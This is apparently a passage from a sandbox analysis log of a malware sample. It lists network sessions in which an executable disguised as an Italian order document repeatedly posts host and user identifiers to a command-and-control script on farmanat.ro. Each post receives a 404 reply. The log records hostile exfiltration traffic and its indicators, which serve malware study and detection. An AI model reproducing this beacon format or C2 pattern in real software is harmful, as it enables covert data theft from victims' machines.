Nov 25, 2021 10:50:34.695179939 CET	6708	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
282	192.168.11.20	50124	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:35.099443913 CET	6709	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:35.132868052 CET	6709	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:35.189446926 CET	6709	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
283	192.168.11.20	50125	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:35.566498041 CET	6710	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:35.600450039 CET	6710	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:35.649811029 CET	6711	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
284	192.168.11.20	50126	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:36.059382915 CET	6711	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:36.093750000 CET	6712	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:36.143910885 CET	6712	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
285	192.168.11.20	50127	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:36.558923006 CET	6713	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:36.592489958 CET	6713	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:36.641537905 CET	6713	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
286	192.168.11.20	50128	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:37.058804035 CET	6714	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:37.092382908 CET	6714	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:37.141966105 CET	6715	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
287	192.168.11.20	50129	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:37.561801910 CET	6715	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:37.595424891 CET	6716	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:37.644316912 CET	6716	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
288	192.168.11.20	50130	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:38.063390017 CET	6717	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:38.096797943 CET	6717	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:38.146338940 CET	6717	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
289	192.168.11.20	50131	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:38.501799107 CET	6718	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:38.536156893 CET	6718	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:38.586780071 CET	6719	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.11.20	49864	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:20.354984999 CET	6345	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:20.388570070 CET	6345	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:20.438185930 CET	6345	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
290	192.168.11.20	50132	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:38.984853029 CET	6719	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:39.018599987 CET	6720	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:39.068985939 CET	6720	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
291	192.168.11.20	50133	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:39.497980118 CET	6721	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:39.532198906 CET	6721	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:39.594016075 CET	6721	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
292	192.168.11.20	50134	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:40.012551069 CET	6722	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:40.046864033 CET	6722	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:40.099014997 CET	6723	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
293	192.168.11.20	50135	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:40.520116091 CET	6723	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:40.553749084 CET	6724	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:40.605904102 CET	6724	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
294	192.168.11.20	50136	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:41.030704975 CET	6725	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:41.064265966 CET	6725	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:41.114002943 CET	6725	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
295	192.168.11.20	50137	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:41.524483919 CET	6726	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:41.558692932 CET	6726	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:41.609107018 CET	6727	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
296	192.168.11.20	50138	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:42.040785074 CET	6727	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:42.075083971 CET	6728	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:42.125179052 CET	6728	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
297	192.168.11.20	50139	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:42.534729004 CET	6729	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:42.568723917 CET	6729	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:42.618726015 CET	6729	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
298	192.168.11.20	50140	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:43.037328959 CET	6730	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:43.071548939 CET	6730	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:43.121603966 CET	6731	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
299	192.168.11.20	50141	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:43.557050943 CET	6731	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:43.590641975 CET	6732	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:43.646503925 CET	6732	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.11.20	49822	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:01.719255924 CET	6303	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:01.752748013 CET	6303	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:01.885267019 CET	6304	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.11.20	49865	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
